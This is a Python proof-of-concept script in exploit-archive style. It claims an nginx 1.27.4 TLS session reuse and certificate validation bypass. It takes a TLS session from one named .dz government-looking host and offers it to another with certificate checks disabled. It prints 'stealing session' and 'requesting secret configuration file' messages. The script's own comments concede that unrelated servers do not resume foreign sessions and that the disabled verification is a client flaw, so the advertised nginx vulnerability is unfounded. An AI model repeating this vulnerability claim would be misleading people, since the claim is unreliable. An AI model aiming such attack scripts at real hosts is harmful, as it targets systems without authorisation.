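#!/usr/bin/env python3
# ==================================================================================================================================
# Title : nginx 1.27.4 Insecure TLS Session Reuse and SSL Certificate Validation Bypass
# Author : indoushka
# Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 151.0.3 (64 bits)
# Vendor : https://nginx.org/
# ==================================================================================================================================
#
# [+] Summary : reuse a TLS/SSL session obtained from one server when connecting to a
#     different server while completely disabling certificate and hostname verification.
#     The script establishes encrypted connections, captures a TLS session object,
#     attempts session resumption on another host, and requests a protected API endpoint.
#
# [+] PoC :
"""Check whether a TLS session issued by one server is resumed by a different server.

What this script can and cannot show:

* Certificate and hostname verification are switched off (``create_insecure_context``),
  so nothing observed here proves the identity of either peer -- any host answering on
  port 443 would behave the same. Disabling verification is a weakness of this client,
  not of the server it talks to.
* A server only resumes sessions that it (or a peer sharing its session-ticket keys)
  issued. Offering ``stolen_session`` to an unrelated server is expected to fall back to
  a full handshake. ``SSLSocket.session_reused`` is the only reliable indicator of
  resumption and is reported below; an HTTP ``200 OK`` on its own shows merely that the
  second server answered an unauthenticated GET.
"""
import socket
import ssl

SOURCE_SERVER = "target01.gov.dz"
TARGET_SERVER = "target02.dz"
# Request target kept exactly as in the original write-up ('LINK API' is its placeholder).
REQUEST_PATH = "'LINK API'"
RECV_CHUNK = 8000


def create_insecure_context():
    """Create an SSL context that does not verify the certificate.

    Returns:
        ``ssl.SSLContext`` with hostname checking off and ``verify_mode`` set to
        ``ssl.CERT_NONE``: the peer certificate is never authenticated, so a
        connection made with it is encrypted but not authenticated.
    """
    context = ssl.create_default_context()
    # check_hostname has to be cleared first; CERT_NONE is rejected while it is True.
    context.check_hostname = False
    context.verify_mode = ssl.CERT_NONE
    return context


def fetch_session(context, host, port=443):
    """Open a TLS connection to ``host`` and return the ``ssl.SSLSession`` it yields.

    Args:
        context: the ``ssl.SSLContext`` to handshake with.
        host: server name used both for the TCP connection and for SNI.
        port: TCP port, 443 by default.

    Returns:
        The session object, or ``None`` if none was recorded on the socket.
    """
    with socket.create_connection((host, port)) as raw:
        with context.wrap_socket(raw, server_hostname=host) as tls:
            # NOTE(review): with TLS 1.3 the session ticket is delivered after the
            # handshake, so ``tls.session`` may still be None here -- confirm against
            # ``tls.version()`` when that happens.
            return tls.session


def read_response(tls, chunk=RECV_CHUNK):
    """Read from ``tls`` until the peer closes (the request sends ``Connection: close``).

    A single ``recv`` may return only part of the reply; looping until EOF avoids
    truncating the status line or body.
    """
    parts = []
    while True:
        data = tls.recv(chunk)
        if not data:
            break
        parts.append(data)
    return b"".join(parts)


def response_body(response):
    """Return the HTTP body of ``response``, or ``b""`` if no header terminator is present."""
    _head, separator, body = response.partition(b"\r\n\r\n")
    return body if separator else b""


def main():
    """Run the check end to end and print what was actually observed."""
    print(f" Starting attack from {SOURCE_SERVER} to {TARGET_SERVER}")
    print("Preparing connection (without certificate verification)...")
    ssl_context = create_insecure_context()

    print(f" Connecting to {SOURCE_SERVER}...")
    print(" Stealing session...")
    stolen_session = fetch_session(ssl_context, SOURCE_SERVER)
    print(f"Session obtained: {stolen_session}")
    if stolen_session is None:
        print("No session object was recorded; there is nothing to offer for resumption.")
        return

    print(f"\n Attempting to enter {TARGET_SERVER} using the stolen session...")
    request = (
        f"GET {REQUEST_PATH} HTTP/1.1\r\n"
        f"Host: {TARGET_SERVER}\r\n"
        "Connection: close\r\n\r\n"
    )
    with socket.create_connection((TARGET_SERVER, 443)) as raw:
        # ``session`` must come from this same context object; wrap_socket raises
        # ValueError otherwise. The handshake completes inside wrap_socket.
        with ssl_context.wrap_socket(
            raw, server_hostname=TARGET_SERVER, session=stolen_session
        ) as tls:
            resumed = tls.session_reused
            print("Requesting secret configuration file...")
            tls.sendall(request.encode())  # send() may write only part of the buffer
            response = read_response(tls)

    print("\n" + "=" * 50)
    if resumed:
        print(f"Session WAS resumed by {TARGET_SERVER} (it accepted a ticket/ID it did not issue).")
    else:
        print(
            f"Session was NOT resumed: {TARGET_SERVER} performed a full handshake, "
            "so the response below does not depend on the stolen session."
        )
    print("=" * 50)

    if b"200 OK" in response:
        print("Server answered 200 OK to an unauthenticated GET.")
        print("Response body:")
        print("=" * 50)
        # errors='ignore' never raises, so no fallback is needed.
        print(response_body(response).decode("utf-8", errors="ignore")[:1500])
    else:
        print("\n Attack Failed")
        print(f"Server response: {response[:200]}")


if __name__ == "__main__":
    main()

# Greetings to :==============================================================================
# jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
# ============================================================================================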